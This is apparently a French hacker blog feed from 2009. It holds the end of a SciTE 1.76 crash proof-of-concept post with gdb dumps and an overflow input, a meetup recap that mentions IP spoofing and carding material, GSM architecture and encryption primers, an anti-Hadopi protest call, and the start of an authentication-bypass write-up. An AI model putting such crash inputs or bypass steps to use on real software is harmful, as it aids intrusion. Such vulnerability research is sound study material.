<br /><span style="color: rgb(255, 0, 0);">0xbffff68b: 0x41414141 0x41414141 0x00414141 0x4942524f</span>
<br /><span style="color: rgb(255, 0, 0);">0xbffff69b: 0x4f535f54 0x54454b43 0x3d524944 0x706d742f</span>
<br /><span style="color: rgb(255, 0, 0);">0xbffff6ab: 0x62726f2f 0x6b2d7469 0x007a6b6d 0x5f485353</span>
<br /><span style="color: rgb(255, 0, 0);">0xbffff6bb: 0x4e454741 0x49505f54 0x34313d44 0x47003033</span>
<br />
<br />
<br /><span style="color: rgb(255, 0, 0);">#13 0x008fcb56 in __libc_start_main (main=0x805dca1, argc=2, ubp_av=0xbfffb524,</span>
<br /><span style="color: rgb(255, 0, 0);"> init=0x8106380, fini=0x8106370, rtld_fini=0x11dd20 <_dl_fini>,</span>
<br /><span style="color: rgb(255, 0, 0);"> stack_end=0xbfffb51c) at libc-start.c:220</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">Si on look a quelques offsets pret , on s'apperçois que nos \x41 se retrouve bien sur la stack (grace a stack_end et la ligne :</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">25 AT_RANDOM Address of 16 random bytes 0xbfffb66b ..... entre autre )</span>
<br />
<br />
<br /><span style="color: rgb(192, 192, 192);"> /* Début des \x41 a l'offset de fin de la stack +350 octets (soit 350 octets plus haut , la pile croit vers les adresses basses) */</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">On peux néanmoins déduire qu'il ne s'agit pas d'un cas classique de stack overflow ( et a priori EIP ne peut etre overwrité).</span>
<br /><span style="color: rgb(192, 192, 192);">Une de mes "intuitions" me poussa donc a déposer un breakpoint sur l'offset correspondant au début de la section .dtors puis .ctors :</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">la .dtors ne donnant rien ...</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">breakpoint sur .ctors :</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">r</span>
<br /><span style="color: rgb(255, 0, 0);">The program being debugged has been started already.</span>
<br /><span style="color: rgb(255, 0, 0);">Start it from the beginning? (y or n) y</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">Starting program: /usr/bin/scite `perl -e'print"A"x4096'`</span>
<br /><span style="color: rgb(255, 0, 0);">[Thread debugging using libthread_db enabled]</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">Program received signal SIGSEGV, Segmentation fault.</span>
<br /><span style="color: rgb(255, 0, 0);">0x0810643b in ?? ()</span>
<br /><span style="color: rgb(192, 192, 192);">crash a l'appel de la .ctors ??</span>
<br />
<br />
<br /><span style="color: rgb(192, 192, 192);">J'avoue que je suis assez perplexe , et que l'exploitation ne sera pas des plus easy , mais d'autres pistes ont germés depuis ces dumps (ret into entre autre) ;-) et puis c'est tout l'intéret aprés tout .</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">J'espere que cette petite presentation de mon PoC concernant Scite 1.76 vous donnera envie de voir la suite (un jour peu etre qui sait ).</span>
<br />
<br /><a href="http://www.exploit-db.com/exploits/14083/">Link du PoC </a>
<br />
<br /></se></se></incomplete>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-19702860463746901752009-04-05T16:32:00.000+02:002009-04-05T16:33:55.219+02:00Résumé du 2600 Nîmes du Samedi 04 Avril<span style="color: rgb(204, 204, 204);">Le rendez-vous avait lieu a 14h devant un centre commercial en centre ville le temp que tout le monde soit présent et hop , direction un petit bistro simpa pour lancer ce petit meet .</span><br /><br /><span style="color: rgb(204, 204, 204);">Les discussions se sont trés vite dirigées sur Hadopi avec une petite vidéo simpathique a l'appuis , l'actualité et les moyens alternatifs concernants le P2P (entre autre), l'avenir de freenet , silc ...enfin , divers moyens de communications et partages sécurisés.</span><br /><br /><br /><span style="color: rgb(204, 204, 204);"> Aprés quelques cafés, nous abordons l'insécurité de certains moyens de paiement en ligne puis au moment ou les bieres arrivent a notre table, retour sur l'anonymat avec une breve présentation sur l'ip spoofing via un petit utilitaire .</span><br /><br /><span style="color: rgb(204, 204, 204);"> Viens ensuite l'architecture des réseaux de téléphonie mobile ,le phreaking gsm nous poursuivons par Hebiko qui nous présente de la doc intéréssante sur le carding .</span><br /><br /><span style="color: rgb(204, 204, 204);"> De fil en aiguille les discours s'enchainent , documents a l'appuis jusqu'a la fin de ce petit meet fort sympathique malgrés le petit comité présent (4personnes).</span><br /><span style="color: rgb(204, 204, 204);"> Enfin ,nous nous dirigeons vers la sortie avec un petit " au mois prochain " qui fait plaisir a entendre pour ce 2k6 Nîmois qui peu etre commencerait a prendre ? Espérons-le :-} .</span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-50456010144709196542009-03-30T16:24:00.000+02:002009-03-30T18:07:46.528+02:00Réseaux GSM : chapitre II<div style="text-align: left; color: rgb(204, 204, 204);">Salut , me revoila , je poursuis mon aventure ....<br /><br />Cette fois -ci nous allons nous intérésser a des choses bien plus passionante (fallait bien avoir les bases avant quand meme , chaque choses en son temp :-P ).<br /><br />Allez , c'est reparti :<br /></div><br /><br /><br /><div style="text-align: center; color: rgb(204, 204, 204);"><span style="font-weight: bold; color: rgb(255, 0, 0);">[+] Etude simplifiée des fréquences de travail du GSM : </span><br /></div><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> Le systeme GSM/DCS utilise 2 fréquences :<br /><br /></span><div style="text-align: center;"><span style="color: rgb(204, 204, 204);">une autour des 900 MHz (GSM) et l’autre autour de 1,8 GHz (DCS).</span><br /></div><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> Chacune est elle meme divisée en 2 sous bandes servantent l’une pour le transfert d’informations entre le mobile et la station de base <span style="color: rgb(255, 153, 102);">( voie montante )</span> , et l’autre pour la liaison entre la station de base et le mobile <span style="color: rgb(255, 153, 102);">( voie descendante )</span> :</span><br /><br /><br /><span style="color: rgb(204, 204, 204);"> </span><br /><div style="text-align: center;"><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 0, 0);"> # bande EGSM étendue</span> ( bande de largeur totale 35 MHz )</span><br /><span style="color: rgb(204, 204, 204);"> - de 880 à 915 MHz du mobile vers la base (voie montante)</span><br /><span style="color: rgb(204, 204, 204);"> - de 925 à 960 MHz de la base vers le mobile (voie descendante)</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(255, 255, 204);"> + écart entre les deux fréquences: 45 MHz</span><br /><span style="color: rgb(255, 255, 204);"> - 174 canaux espacés de 200 kHz</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 0, 0);"> # bande DCS</span> ( bande de largeur totale 75 MHz )</span><br /><span style="color: rgb(204, 204, 204);"> - de 1710 à 1785 MHz du mobile vers la base (voie montante)</span><br /><span style="color: rgb(204, 204, 204);"> - de 1805 à 1880 MHz de la base vers le mobile (voie descendante)</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 255, 153);">+ écart entre les deux fréquences: 95 MHz</span></span><br /><span style="color: rgb(255, 255, 153);"> - 374 canaux espacés de 200 kHz</span><br /><br /></div><br /><br /><br /><div style="text-align: center; color: rgb(204, 204, 204);">L'utilisation de fréquences moins élevées augmenterait sensiblement la portée des stations de base.<br />Ainsi en 450 MHz, leur portée serait près du double de ce qu'elle serait en 900 MHz.<br /></div><br /><span style="color: rgb(204, 204, 204);"> Ericsson et Nokia travaillent à la mise au point d'une norme GSM fonctionnant en 450 MHz ou en 480 MHz.</span><br /><br /><span style="color: rgb(204, 204, 204);">Dans la bande 450, les fréquences utilisées seraient 450,4 à 457,6 MHz pour les liaisons montantes (GSM vers station de base) et 460,4 à 467,6 MHz pour les liaisons descendantes.</span><br /><br /><span style="color: rgb(204, 204, 204);">Une BTS émet en permanence des informations sur son canal BCH (Broadcast Channel appelé aussi voie balise) constituant ainsi un lien permanent entre mobile et station de base à partir de la mise en route du mobile jusqu’à sa mise hors service, qu’il soit en communication ou non.</span><br /><br /><br /><br /><br /><br /><div style="text-align: center; color: rgb(204, 204, 204);"><span style="font-weight: bold; color: rgb(255, 0, 0);">[+] Adresssage , Confidentialité et Sécurité de la transmission sur la voie radio (interface Um):</span><br /></div><br /><div style="text-align: right; color: rgb(204, 204, 204);"><div style="text-align: center;"> <span style="color: rgb(51, 255, 51); font-style: italic;">-Pré-requis:</span><br /></div><br /><span style="color: rgb(51, 255, 255);">1) I.M.S.I :</span><br /><br /><span style="color: rgb(51, 255, 51);">*</span>Numéro (identité) d'abonné se trouvant dans la SIM d'une part et dans la HLR d'autre part (logique)<br />IMSI n'est connu qu'a l'intérieur du réseau GSM et doit ( autant que possible) rester secrete (d'ou l'utilisation de TMSI).<br /><br /><br /><br /><span style="color: rgb(51, 255, 255);">2) T.M.S.I :</span><br /><br /><span style="color: rgb(102, 255, 153);">*</span>Identifiant temporaire codé sur 4 Octets modifié a chaque changement de zone (gérer pas un VLR) .<br />Le TMSI est utilisé pour identifier le mobile appelé ou appelant lors de l’établissement d’une communication .<br /><br /><span style="color: rgb(51, 255, 255);">3) M.S.I.S.D.N :</span><br /><br /><span style="color: rgb(102, 255, 153);">*</span>Numéro de l'abonné . C'est la seule donnée concernant l'identitée de l'abonné connu hors réseaux GSM .<br /><br /><br /><br /><br /><span style="color: rgb(51, 255, 255);"> 4) M.S.R.N :</span><br /><br /><span style="color: rgb(102, 255, 153);">*</span>Numéro attribué lors de l'établissement d'un appel permettant d'acheminer les appels via les commutateurs (MSC)<br /><br /><br /><br /><br /><br /><br /><span style="color: rgb(51, 255, 255);">5) I.M.E.I : </span><br /><br /><span style="color: rgb(102, 255, 153);">*</span>Numéro d'équipement mis en mémoire dans le portable a la fabrication , c'est donc l'identifiant de l'appareil .<br /></div><br /><br /><br /><br /><span style="color: rgb(204, 204, 204);">L'IMSI est transmis a la mise sous tension du mobile afin d'éviter de l'emmettre fréquemment de cette maniere il est plus difficile de l'intercepter.</span><br /><br /><span style="color: rgb(204, 204, 204);">Une fois l'IMSI transmis , les TMSI successives du mobile seront transmises. Ce n’est qu’en cas de perte du TMSI ou lorsque le VLR courant ne la reconnaît pas (par exemple après une panne) que l’IMSI peut être retransmise.</span><br /><br /><span style="color: rgb(204, 204, 204);">En cas d'echec lors de la vérification d'un de ces identifiants ,on interdit l'accés aux services.</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> L’allocation d’une nouvelle TMSI est faite au minimum à chaque changement de VLR, et suivant le choix de l’opérateur, à chaque intervention du mobile. Son envoi à la station mobile a lieu en mode chiffré . </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><div style="text-align: center; color: rgb(204, 204, 204);"> <span style="color: rgb(102, 255, 153);">*</span> <span style="font-weight: bold; color: rgb(51, 255, 255);">Le chiffrement GSM sur la voie radio (interface Um):</span><br /></div><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> Pour assurer la confidentialité de leurs abonnés , les opérateurs ont recours au éléments suivant :</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> -Nombres aléatoire <span style="color: rgb(255, 204, 102);">RAND</span><span style="color: rgb(255, 204, 102);"> (128 Bits</span></span>)<br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> -une clée appellée <span style="color: rgb(255, 204, 102);">Ki</span> (128 Bits) pour l'authentification et la création d'une seconde clée <span style="color: rgb(255, 204, 102);">Kc</span> ( en 64 Bits) (la clée Ki,stockée dans la carte SIM et dans l'AUC coté réseaux , est attribuée lors de l'abonnement avec l'IMSI) </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> -un algorithme <span style="color: rgb(255, 204, 102);">A3</span> fournissant le nombre <span style="color: rgb(255, 204, 102);">SRES (32 Bits)</span> à partir des arguments de RAND et de la clé Ki (contruction SRES)</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> -un algorithme <span style="color: rgb(255, 204, 102);">A8</span> pour la détermination de la clé Kc à partir des arguments de RAND et Ki (construction clée Kc)</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> -un algorithme <span style="color: rgb(255, 204, 102);">A5</span> pour le chiffrement / déchiffrement des données à partir de la clé Kc (chiffrement a proprement parlé)</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><div style="text-align: center;"><span style="color: rgb(204, 204, 204);"> <span style="font-style: italic;">Chaque abonné utilise une clé Ki propre. </span></span><br /><span style="color: rgb(204, 204, 204); font-style: italic;"> Les algorithmes A3, A5 et A8 sont quant à eux les mêmes pour tous les abonnés d’un même réseau.</span><br /></div><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);">-- Schéma Simplifié -- </span><br /><br /><div style="text-align: justify; color: rgb(204, 204, 204);"> <span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);">RAND(128Bits) ->SRES=A3[Rand(128Bits),Ki(128Bits)] -> Kc=A8[Rand(128Bits),Ki(128 Bits)] -> [N° de Trames en 22 Bits, Clée Kc(64 Bits)] -> Algorithme A5 -> Trames Chiffrées</span><br /></div><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><div style="text-align: left;"><span style="color: rgb(204, 204, 204);">Le centre d’authentification (AUC) stocke ainsi :</span><br /><span style="color: rgb(204, 204, 204);"> -l’algorithme d’authentification A3,</span><br /><span style="color: rgb(204, 204, 204);"> -l’algorithme de génération de la clé de chiffrement A8 </span><br /><span style="color: rgb(204, 204, 204);"> -les clés Ki des différents abonnés du réseau GSM.</span><br /></div><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);">Le HLR stocke les (Kc, RAND, SRES) pour chaque IMSI.</span><br /><br /><span style="color: rgb(204, 204, 204);">Dans le VLR les (Kc, RAND, SRES) sont enregistrés pour chaque IMSI avec les couples TMSI - IMSI .</span><br /><br /><span style="color: rgb(204, 204, 204);">La BTS quand a elle ,stocke l’algorithme de chiffrement A5 pour les données usager et pour les données de signalisation.</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><div style="text-align: center; color: rgb(204, 204, 204);"> <span style="font-style: italic; color: rgb(255, 255, 255);">La station mobile (MS) quand a elle , contient dans la carte SIM de l’abonné : l’algorithme d’authentification A3, l’algorithme de chiffrement A5, l’algorithme de génération des clés de chiffrements A8, la clé d’authentification individuelle de l’utilisateur Ki, la clé de chiffrement Kc, le numéro de séquence de la clé de chiffrement et le TMSI. </span><br /><br /><br /><div style="text-align: justify;">Voila actuellement ou j'en suis , je pense que maintenant il commence a y avoir matière a réflexions et par conséquent je vous donne rendez-vous ici d'ici quelques temps pour de nouvelles aventures qui j'espère vous plaisent et vous permettent autant qu'a moi de découvrir de nouvelles choses .<br /><br />Cya \o><br /><br />Liens utiles:<br /><a href="http://fr.wikipedia.org/wiki/A5/1">http://fr.wikipedia.org/wiki/A5/1</a><br /><a href="http://internetmobile.falorni.fr/publications/securite-architecture-gsm/">http://internetmobile.falorni.fr/publications/securite-architecture-gsm/</a><br /></div></div><span style="color: rgb(204, 204, 204);"> </span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com1tag:blogger.com,1999:blog-4457623080129847893.post-50218231708815186172009-03-18T17:25:00.000+01:002009-03-18T18:13:30.125+01:00Réseaux GSM : chapitre I<div style="text-align: left;"><span style="color: rgb(204, 204, 204);">Salut a tous !</span><br /><br /><span style="color: rgb(204, 204, 204);">Alors voila , j'ai décider de me lancer dans une nouvelle aventure : l'univers des réseaux de télécommunication mobile ou GSM (Global System for Mobile communications) .</span><br /><br /><span style="color: rgb(204, 204, 204);">Voici donc une première approche afin de comprendre un peu mieux les bases de ce monde pour ma part encore trop peu exploré jusqu'alors , et pourtant incontournable et qui plus est , en pleine expansion !</span><br /></div><span style="font-weight: bold;"><br /></span><div style="text-align: right;"><span style="font-weight: bold;"><span style="color: rgb(153, 153, 255);">Pré-requis</span></span><br /><br /><span style="font-weight: bold;"><span style="color: rgb(255, 255, 255);">Zone cellulaire :</span></span> <span style="color: rgb(204, 204, 204);">Zone couverte</span><br /><span style="color: rgb(204, 204, 204);">Les cellules sont plus ou moins grandes en fonction du nombre potentiel d’abonnés qu’elles doivent gérer .</span><br /><span style="color: rgb(204, 204, 204);">Ainsi , les zones de couverture des cellules voient leur taille diminuer ( + d'abonnés == cellules plus petites ) pour garantir une large bande passante aux</span><br /><span style="color: rgb(204, 204, 204);">utilisateurs.</span><br /><br /><span style="font-weight: bold; color: rgb(255, 255, 255);">Routage:</span> <span style="color: rgb(204, 204, 204);">Construction d’un chemin de communication entre deux téléphones mobiles.</span><br /></div><br /><br /> <span style="font-weight: bold;"> </span><div style="text-align: center;"><span style="font-weight: bold; color: rgb(102, 255, 255);"><span style="font-style: italic;"> [+] Architecture d'un Réseau GSM</span></span><br /></div><br /><br /> <span style="font-weight: bold; color: rgb(51, 255, 255);">1) Le MS :</span><br /><br /><span style="color: rgb(204, 204, 204);">Dans réseau GSM, le terminal mobile MS (Mobile Segment)a trois aspects :</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">*</span> Le téléphone de voiture</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">*</span> Le portable d'une puissance de 8 W</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">*</span> Le portatif (terminal de poche), d'un poids compris entre 150 et 350 grammes et d'une puissance d'environ 2W</span><br /><br /><br /><span style="font-style: italic; color: rgb(153, 153, 255);">Le terminal est scindé en deux parties :</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(102, 255, 153);">*</span> Le combiné téléphonique identifié par un numéro unique : l'IMEI (International Mobile Equipement Identity) qui est l'identité internationale spécifique à chaque combiné.<br />En pratique ce numéro n'est que peu utilisé</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(102, 255, 153);">*</span> La carte SIM (Subscriber Identity Module) et qui contient les informations suivantes :</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">o-</span> Le numéro d'identification temporaire attribué par le réseau qui permet la localisation et qui est utilisé sur les canaux radio (TMSI Temporary Station Identity)<br /></span><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">o-</span> La liste des fréquences à écouter pour identifier la meilleure Station de Base (BTS)</span><br /><span style="color: rgb(204, 204, 204);"><span style="color: rgb(255, 153, 102);">o-</span> Les algorithmes de chiffrement</span><br /><br /><span style="color: rgb(204, 204, 204);">Cette liste n'est pas exhaustive. D'autres informations sont stockées sur cette carte, tel que le code permettant de la débloquer :<br /><br />une carte SIM se bloque automatiquement après un certain nombre d'erreurs sur le code entré par l'utilisateur.</span><br /><br /><span style="color: rgb(204, 204, 204);">Cet ensemble permet d'accéder aux services d'un PLMN GSM.<br /><br />Cette découpe permet à l'usager d'utiliser n'importe que terminal GSM car son identification complète est portée par la carte SIM.<br /> L'établissement d'une communication commence toujours par une phase d'authentification durant laquelle le réseau dialogue avec la carte SIM.</span><br /><br /><span style="color: rgb(204, 204, 204);">Le terminal mobile a pour seule interface les équipements de type BTS et ses fonctionnalités sont :</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">*</span> La gestion de la liaison de données avec le BTS (protocole LAPDm)</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">*</span> La surveillance périodique de l'environnement par des séries de mesure stockées sur la carte SIM</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">*</span> La restitution des données vocales ou non (messagerie) destinées à l'abonné</span><br /><br /><span style="color: rgb(204, 204, 204);"> <span style="color: rgb(255, 153, 0);">*</span> Les opérations de chiffrement</span><br /><br /><br /><br /><br /><br /> <span style="font-weight: bold; color: rgb(102, 255, 255);">2)Le BSS (Base Station sub System) comprend :</span><br /><br /><br /><span style="color: rgb(204, 204, 204);"><span style="color: rgb(102, 255, 153);">*</span>BTS ( Base Transceiver Station)</span><br /><span style="color: rgb(204, 204, 204);"> Les stations de base (BTS) assurent la couverture de l’aire de service :</span><br /><span style="color: rgb(204, 204, 204);"> Chaque cellule dispose d’une BTS et d’une seule,une BTS gère la transmission radio.</span><br /><br /><span style="color: rgb(204, 204, 204);">-Une BTS est reliée à un contrôleur de station de base BSC (BSC, base station controller).</span><br /><br /><br /><br /><span style="color: rgb(204, 204, 204);"><span style="color: rgb(102, 255, 153);">*</span>BSC (Base Station Controller)</span><br /><span style="color: rgb(204, 204, 204);"> Un BSC est lui-même relié à un commutateur de service mobile (MSC, mobiles services switching center).</span><br /><br /> <div style="text-align: center;"><span style="color: rgb(255, 0, 0);">( 1 seule BTS par cellule mais un BSC gère un ensemble de BTS )</span><br /></div><br /><span style="color: rgb(204, 204, 204);">Le BSC organise la supervision, l’allocation et la relâche des canaux radios (routage), conformément aux demandes reçues du MSC.</span><br /><br /><br /><br /><br /> <span style="font-weight: bold; color: rgb(102, 255, 255);"> 3) Le NSS comprend : des bases de données (HLR) et des commutateurs (MSC)</span><br /><br /><br /><span style="color: rgb(204, 204, 204);"><span style="color: rgb(255, 153, 102);">*</span>HLR (Home Location Register)</span><br /><br /><span style="color: rgb(204, 204, 204);"> Un HLR est une base de données de localisation et de caractérisation des abonnés .</span><br /><br /><span style="color: rgb(204, 204, 204);">A l’aide du numéro appelé (appel entrant), on en déduit la localisation du destinataire grâce à l’enregistreur de localisation nominal (HLR).</span><br /><br /><span style="color: rgb(204, 204, 204);"> Le HLR fournit l’adresse du MSC, BSC, et BTS couvrant l’aire dans laquelle se trouve le destinataire.</span><br /><br /><br /><br /><br /><span style="color: rgb(204, 204, 204);"><span style="color: rgb(255, 153, 102);">*</span>MSC (Mobile-services Switching Center)</span><br /><br /><span style="color: rgb(204, 204, 204);"> Les MSC sont des commutateurs mobiles associés en général aux bases de données VLR (Visitor Location Register) .</span><br /><span style="color: rgb(204, 204, 204);"> Le MSC gère l’établissement d’appel, la relâche d’appel, et tout ce qui est lié aux identités des abonnés</span><br /><br /><br /><br /><br /><span style="color: rgb(204, 204, 204);"><span style="color: rgb(255, 153, 102);">*</span>VLR (Visitor Location Register)</span><br /><br /><span style="color: rgb(204, 204, 204);"> C'est la base de données qui gère les abonnés présents dans une certaine zone géographique.</span><br /><span style="color: rgb(204, 204, 204);"> Ces informations sont une copie de l'original conservé dans le HLR.</span><br /><br /><span style="color: rgb(204, 204, 204);"><span style="color: rgb(255, 153, 102);">*</span>AuC (Authentication Center)</span><br /><br /><span style="color: rgb(204, 204, 204);"> Il mémorise pour chaque abonné une clé secrète utilisée pour authentifier les demandes de services et pour le chiffrement des communications. Un AuC est en général associé à chaque HLR.</span><br /><br /><span style="font-weight: bold;"><br /><br /></span><div style="text-align: center;"><span style="font-weight: bold; color: rgb(51, 255, 255);"><span style="font-style: italic; color: rgb(51, 102, 255);">[+] Schéma simplifié d'un réseau GSM ( topologie de type "Arbre")</span></span><br /></div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA0oxr9hOjJmGcCB3sexdEo_oXeCG2S0JzZOB6oaOaskNa10KnGFHrtz9jo4h2SQRMBFswcWn8rQWcmQKj5wqDR3-DAm1qOLMd49Kp6aNVZdaNL1Na1vPCrd66ZZAHWvJHXQpID9WBbzbE/s1600-h/Sch%C3%A9ma-r%C3%A9seau-GSM.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 213px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA0oxr9hOjJmGcCB3sexdEo_oXeCG2S0JzZOB6oaOaskNa10KnGFHrtz9jo4h2SQRMBFswcWn8rQWcmQKj5wqDR3-DAm1qOLMd49Kp6aNVZdaNL1Na1vPCrd66ZZAHWvJHXQpID9WBbzbE/s400/Sch%C3%A9ma-r%C3%A9seau-GSM.jpg" alt="" id="BLOGGER_PHOTO_ID_5314570991704208402" border="0" /></a><br /><br /> <span style="font-weight: bold; color: rgb(102, 255, 255);">4) Les interfaces :</span><br /><br /><span style="color: rgb(204, 204, 204); font-style: italic;">a)L’interface Um</span><br /><span style="color: rgb(204, 204, 204);">C’est l’interface entre les deux sous systèmes MS (Mobile Station) et le BSS (Base Station Sub-system. On la nomme couramment « interface radio » ou « interface air ».</span><br /><br /><span style="color: rgb(204, 204, 204); font-style: italic;">b)L’interface Abis</span><br /><span style="color: rgb(204, 204, 204);">C’est l’interface entre les deux composants du sous système BSS : la BTS (Base Station Transceiver) et le BSC (Base Station Controler).</span><br /><br /><span style="color: rgb(204, 204, 204); font-style: italic;">c)L’interface A</span><br /><span style="color: rgb(204, 204, 204);">C’est l’interface entre les deux sous systèmes BSS (Base Station Sub System) et le NSS (Network Sub System).<br /><br />Voila pour l'introduction , j'espère que cet article vous aura permis d'apprendre deux trois choses concernant les réseaux de téléphonie mobile .<br /><br />Rendez-vous sous peu pour la suite .<br /><br />Have Fun !<br /></span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com4tag:blogger.com,1999:blog-4457623080129847893.post-73091247789798800662009-02-27T12:05:00.000+01:002009-02-27T16:58:31.599+01:00Parce que la France n’est pas la Chine,parceque ce sont les utilisateurs qui ont fait du cyber espace ce ce qu'il est aujourd'hui : "BLACK-OUT" !<div style="text-align: center; color: rgb(204, 204, 204);"><strong style="font-weight: normal; font-style: italic;">(!) Devant le ridicule d'un gouvernement qui s'entête à vouloir déconnecter du Net des familles</strong><strong style="font-weight: normal; font-style: italic;"> </strong><strong style="font-weight: normal; font-style: italic;"> entières sans preuves valables ni procès, la Quadrature appelle les citoyens épris de liberté à procéder au <em>« black-out »</em> de leurs sites, blogs, profils, avatars, etc. </strong><br /><strong style="font-weight: normal; font-style: italic;"></strong><br /><strong style="font-weight: normal; font-style: italic;">Comme en Nouvelle-Zélande, seul pays avec la France où la « riposte graduée » devait être imposée par la loi, pour finalement être repoussée : </strong><br /><strong style="font-weight: normal; font-style: italic;"></strong><br /><strong style="font-weight: normal; font-style: italic;">pour protester contre cette loi imbécile et sa « liste blanche » de sites autorisés, le Net français doit agir et se draper de noir.</strong><br /></div><br /><br /><br /><strong style="color: rgb(204, 204, 204);">Ainsi , la Quadrature invite tous ses soutiens, individus et collectifs, à :</strong><br /><div style="text-align: center; color: rgb(204, 204, 204);"><br /><br /></div><div style="color: rgb(255, 255, 255); text-align: center;"><span style="color: rgb(204, 204, 204);"> [*] Peindre leurs sites, blogs, profils, courriers, commentaires ou avatars de la couleur noire du « black-out », au besoin en utilisant les images mises à leur disposition.</span><br /><br /><br /><span style="color: rgb(204, 204, 204);"> [*] Afficher un message expliquant les motivations de cette protestation contre une loi absurde, inapplicable et dangereuse qui met en péril le web français, l'innovation, et les libertés fondamentales.</span><br /><br /><span style="color: rgb(204, 204, 204);"> [*] Faire un lien vers le « tableau de bord HADOPI » de La Quadrature du Net.</span><br /><br /><span style="color: rgb(204, 204, 204);"> [*] Contacter son député pour lui annoncer que l'on a procédé au « black-out » de son espace sur le Net pour protester contre la loi « Création et Internet », lui transmettre le dossier de La Quadrature6 et lui demander ce qu'il en pense.</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);"> [*] Inviter ses proches et ses contacts à faire de même.</span><br /></div><br /><br /><br /><div style="text-align: center; color: rgb(204, 204, 204);"><strong>« Cet appel est un hommage rendu aux citoyens néo-zélandais qui ont pu faire entendre la raison à leur gouvernement. Il s'agit d'un remix, d'une réappropriation d'une idée qui, comme la culture, n'existe que pour être partagée. Ce sont ceux qui traitent leurs clients de " pirates " et les députés qui votent leurs lois qu'il faudrait déconnecter !»</strong><br /></div><br /><br /><br /><br /><br /><strong style="color: rgb(204, 204, 204);">Rendez-vous ici pour plus d'infos :<br /><br /><a href="http://www.laquadrature.net/fr/APPEL-HADOPI-blackout-du-net-francais">http://www.laquadrature.net/fr/APPEL-HA … t-francais</a><br /><br />MOBILISONS NOUS ! </strong>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-61199803804715965922009-02-25T22:58:00.000+01:002009-02-27T11:53:27.889+01:00"Sysinfos" is powned .<span style="color: rgb(192, 192, 192);">Au lendemain de l'article sur les .bss overflow posté par mon ami <span style="color: rgb(153, 255, 255);">HyP </span> sur <a href="http://hyperion-hyp.blogspot.com/">son blog</a> , j'ai eu envie de voir comment bypasser l'authentification de son "<span style="font-style: italic;">Sysinfos</span>" mais avec une approche différente .<br /><br />Bon , aprés coup je me suis vite rendu compte que ce serait trés classique voir presque triste , je le reconnait mais 24h aprés la publication de son article , ça me tenter donc ...<br /><br />Code de <a href="http://membres.lycos.fr/profil4/Audits/Sysinfos.c">Sysinfos.c ici</a><br /><br />Premiere étape comme souvent , on désassemble a la recherche d'une ou plusieurs intructions 